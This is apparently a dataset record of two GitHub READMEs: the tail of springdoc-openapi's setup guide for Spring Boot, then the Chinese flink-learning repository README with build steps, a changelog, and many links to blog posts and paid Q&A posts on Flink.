src="https://springdoc.org/img/dmTECH_Logo.jpg" height="10%" width="10%" /> </a> <a href="https://www.contrastsecurity.com/" target="_blank"> <img src="https://springdoc.org/img/contrastsecurity.svg" height="10%" width="30%" /> </a> </p> # Table of Contents - [Full documentation](#full-documentation) - [**Introduction**](#introduction) - [**Getting Started**](#getting-started) - [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui) - [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications) - [Source Code for Demo Applications.](#source-code-for-demo-applications) - [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3) - [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3) - [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3) - [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3) - [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui) - [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice) - [Adding API Information and Security documentation](#adding-api-information-and-security-documentation) - [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers) - [Acknowledgements](#acknowledgements) - [Contributors](#contributors) - [Additional Support](#additional-support) # [Full documentation](https://springdoc.org/) # **Introduction** The springdoc-openapi Java library helps automating the generation of API documentation using Spring Boot projects. springdoc-openapi works by examining an application at runtime to infer API semantics based on Spring configurations, class structure and various annotations. The library automatically generates documentation in JSON/YAML and HTML formatted pages. The generated documentation can be complemented using `swagger-api` annotations. This library supports: * OpenAPI 3 * Spring-boot v3 (Java 17 & Jakarta EE 9) * JSR-303, specifically for @NotNull, @Min, @Max, and @Size. * Swagger-ui * OAuth 2 * GraalVM native images The following video introduces the Library: * [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw) For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/) This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal) # **Getting Started** ## Library for springdoc-openapi integration with spring-boot and swagger-ui * Automatically deploys swagger-ui to a Spring Boot 3.x application * Documentation will be available in HTML format, using the official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git). * The Swagger UI page should then be available at http://server: port/context-path/swagger-ui.html and the OpenAPI description will be available at the following url for json format: http://server:port/context-path/v3/api-docs * `server`: The server name or IP * `port`: The server port * `context-path`: The context path of the application * Documentation can be available in yaml format as well, on the following path: `/v3/api-docs.yaml` * Add the `springdoc-openapi-ui` library to the list of your project dependencies (No additional configuration is needed): ```xml <dependency> <groupId>org.springdoc</groupId> <artifactId>springdoc-openapi-starter-webmvc-ui</artifactId> <version>last-release-version</version> </dependency> ``` * This step is optional: For custom path of the swagger documentation in HTML format, add a custom springdoc property, in your spring-boot configuration file: ```properties # swagger-ui custom path springdoc.swagger-ui.path=/swagger-ui.html ``` ## Spring-boot with OpenAPI Demo applications. ### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master). ## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc). ## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html). ## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html). ## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc). ## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html). ## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html). ![Branching](https://springdoc.org/img/pets.png) ## Integration of the library in a Spring Boot 3.x project without the swagger-ui: * Documentation will be available at the following url for json format: http://server: port/context-path/v3/api-docs * `server`: The server name or IP * `port`: The server port * `context-path`: The context path of the application * Documentation will be available in yaml format as well, on the following path : `/v3/api-docs.yaml` * Add the library to the list of your project dependencies. (No additional configuration is needed) ```xml <dependency> <groupId>org.springdoc</groupId> <artifactId>springdoc-openapi-starter-webmvc-api</artifactId> <version>last-release-version</version> </dependency> ``` * This step is optional: For custom path of the OpenAPI documentation in Json format, add a custom springdoc property, in your spring-boot configuration file: ```properties # /api-docs endpoint custom path springdoc.api-docs.path=/api-docs ``` * This step is optional: If you want to disable `springdoc-openapi` endpoints, add a custom springdoc property, in your `spring-boot` configuration file: ```properties # disable api-docs springdoc.api-docs.enabled=false ``` ## Error Handling for REST using @ControllerAdvice To generate documentation automatically, make sure all the methods declare the HTTP Code responses using the annotation: @ResponseStatus. ## Adding API Information and Security documentation The library uses spring-boot application auto-configured packages to scan for the following annotations in spring beans: OpenAPIDefinition and Info. These annotations declare, API Information: Title, version, licence, security, servers, tags, security and externalDocs. For better performance of documentation generation, declare `@OpenAPIDefinition` and `@SecurityScheme` annotations within a Spring managed bean. ## spring-webflux support with Annotated Controllers * Documentation can be available in yaml format as well, on the following path : /v3/api-docs.yaml * Add the library to the list of your project dependencies (No additional configuration is needed) ```xml <dependency> <groupId>org.springdoc</groupId> <artifactId>springdoc-openapi-starter-webflux-ui</artifactId> <version>last-release-version</version> </dependency> ``` * This step is optional: For custom path of the swagger documentation in HTML format, add a custom springdoc property, in your spring-boot configuration file: ```properties # swagger-ui custom path springdoc.swagger-ui.path=/swagger-ui.html ``` The `springdoc-openapi` libraries are hosted on maven central repository. The artifacts can be viewed accessed at the following locations: Releases: * [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/) . Snapshots: * [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/) . # Acknowledgements ## Contributors springdoc-openapi is relevant and updated regularly due to the valuable contributions from its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors). <a href="https://github.com/springdoc/springdoc-openapi/graphs/contributors"> <img src="https://contrib.rocks/image?repo=springdoc/springdoc-openapi" width="50%"/> </a> Thanks you all for your support! ## Additional Support * [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant resources around Spring projects. * [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for supporting springdoc-openapi project. ![JenBrains logo](https://springdoc.org/img/jetbrains.svg)
0
zhisheng17/flink-learning
flink learning blog. http://www.54tianzhisheng.cn/ 含 Flink 入门、概念、原理、实战、性能调优、源码解析等内容。涉及 Flink Connector、Metrics、Library、DataStream API、Table API & SQL 等内容的学习案例,还有 Flink 落地应用的大型项目案例(PVUV、日志存储、百亿数据实时去重、监控告警)分享。欢迎大家支持我的专栏《大数据实时计算引擎 Flink 实战与性能优化》
clickhouse elasticsearch flink hbase influxdb kafka loki mysql opentsdb rabbitmq redis rocketmq spark stream-processing streaming
# Flink 学习 麻烦路过的各位亲给这个项目点个 star,太不易了,写了这么多,算是对我坚持下来的一种鼓励吧!另外特别感谢 [JetBrains](https://jb.gg/OpenSourceSupport) 公司提供的免费全家桶工具,🙏🙏🙏! ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg) ## Stargazers over time ![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg) ## 本项目结构 ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png) ## How to build Maybe your Maven conf file `settings.xml` mirrors can add aliyun central mirror : ```xml <mirror> <id>alimaven</id> <mirrorOf>central</mirrorOf> <name>aliyun maven</name> <url>https://maven.aliyun.com/repository/central</url> </mirror> ``` then you can run the following command : ``` mvn clean package -Dmaven.test.skip=true ``` you can see following result if build success. ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg) ## Flink 系统专栏 基于 Flink 1.9 讲解的专栏,涉及入门、概念、原理、实战、性能调优、系统案例的讲解。扫码下面专栏二维码可以订阅该专栏 ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg) 首发地址:[http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/) 专栏地址:[https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f) ## Change **2022/02/26** 将自己 《Flink 实战与性能优化》专栏放在 GitHub,参见 books 目录 **2021/12/18** 将该项目的 Flink 版本升级至 1.14.2,如果有需要可以去老的分支查看。 **2021/08/15** 将该项目的 Flink 版本升级至 1.13.2,API 发生重大改变,所以代码结构也做了相应的调整(部分代码在 master 分支已经删除,同时将之前的代码切到 [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0) 上了,如果有需要可以去老的分支查看)。 **2020/02/16** 将该项目的 Flink 版本升级至 1.10,该版本代码都是经过测试成功运行的,尽量以该版本作为参考,如果代码在你们集群测试不成功,麻烦检查 Flink 版本是否一致,或者是否有包冲突问题。 **2019/09/06** 将该项目的 Flink 版本升级到 1.9.0,有一些变动,Flink 1.8.0 版本的代码经群里讨论保存在分支 [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) 以便部分同学需要。 **2019/06/08** 四本 Flink 书籍: + [Introduction_to_Apache_Flink_book.pdf]() 这本书比较薄,处于介绍阶段,国内有这本的翻译书籍 + [Learning Apache Flink.pdf]() 这本书比较基础,初学的话可以多看看 + [Stream Processing with Apache Flink.pdf]() 这本书是 Flink PMC 写的 + [Streaming System.pdf]() 这本书评价不是一般的高 **2019/06/09** 新增流处理引擎相关的 Paper,在 paper 目录下: + [流处理引擎相关的 Paper](./paper/paper.md) **【提示】**:关于书籍的下载,因版权问题,不方便提供,所以已经删除,需要的话可以切换到老分支去下载。 ## 博客 1、[Flink 从0到1学习 —— Apache Flink 介绍](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/) 2、[Flink 从0到1学习 —— Mac 上搭建 Flink 1.6.0 环境并构建运行简单程序入门](http://www.54tianzhisheng.cn/2018/09/18/flink-install) 3、[Flink 从0到1学习 —— Flink 配置文件详解](http://www.54tianzhisheng.cn/2018/10/27/flink-config/) 4、[Flink 从0到1学习 —— Data Source 介绍](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/) 5、[Flink 从0到1学习 —— 如何自定义 Data Source ?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/) 6、[Flink 从0到1学习 —— Data Sink 介绍](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/) 7、[Flink 从0到1学习 —— 如何自定义 Data Sink ?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/) 8、[Flink 从0到1学习 —— Flink Data transformation(转换)](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/) 9、[Flink 从0到1学习 —— 介绍 Flink 中的 Stream Windows](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/) 10、[Flink 从0到1学习 —— Flink 中的几种 Time 详解](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/) 11、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/) 12、[Flink 从0到1学习 —— Flink 项目如何运行?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/) 13、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/) 14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/) 15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/) 16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/) 17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq) 18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ) 19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ) 20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ) 21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq) 22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ) 23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ) 24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ) 25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm) 26、[Flink 从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ) ### Flink 源码项目结构 ![](./pics/Flink-code.png) ## 学习资料 另外我自己整理了些 Flink 的学习资料,目前已经全部放到微信公众号了。 你可以加我的微信:**yuanblog_tzs**,然后回复关键字:**Flink** 即可无条件获取到,转载请联系本人获取授权,违者必究。 ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg) 更多私密资料请加入知识星球! ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg) 有人要问知识星球里面更新什么内容?值得加入吗? 目前知识星球内已更新的系列文章: ### 大数据重磅炸弹 1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR​) 2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN​) 3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) ​ 4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)​ 5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6​)   6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6​) 7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)  ​ 8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY​)   9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ​) 10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA) 11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V) 12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb) 13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r) 14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf) 15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb) 16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3) 17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA) ### 源码系列 1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE) 2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf) 3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ) 4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA) 5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 启动](https://t.zsxq.com/u3fayvf) 6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb) 7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi) 8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ) 9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y) 10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I) 11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf) 12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN) 13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) 14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) 15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM) 16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf) 17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) 18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) 19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) 20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) 21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) 22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) 23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) 24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) 25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) 26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg) 26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J) ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg) 除了《从1到100深入学习Flink》源码学习这个系列文章,《从0到1学习Flink》的案例文章也会优先在知识星球更新,让大家先通过一些 demo 学习 Flink,再去深入源码学习! 如果学习 Flink 的过程中,遇到什么问题,可以在里面提问,我会优先解答,这里做个抱歉,自己平时工作也挺忙,微信的问题不能做全部做一些解答, 但肯定会优先回复给知识星球的付费用户的,庆幸的是现在星球里的活跃氛围还是可以的,有不少问题通过提问和解答的方式沉淀了下来。 1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q) 2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY) 3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq) 4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY) 5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) 6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) 7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV) 8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j) 9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu) 10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f) 11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy) 12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6) 13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ) 14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv) 15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv) 16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf) 17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm) 18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ) 19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf) 20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7) 21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q) 22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ) 23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,导致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U) 24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) 25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) 26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv) 27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV) 28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv) 29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ) 30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6) 31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA) 32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm) 33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF) 34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim) 35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF) 36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b) 37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f) 38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f) 39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f) 40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f) 41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f) 42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu) 43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA) 44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq) 45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa) 46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr) 47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ) 48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN) 49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM) 50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM) 51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv) 52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI) 53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz) 54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2) 55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3) 56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee) 57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz) 58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu) 59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6) 60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN) 61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q) 62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE) 63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI) 64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2) 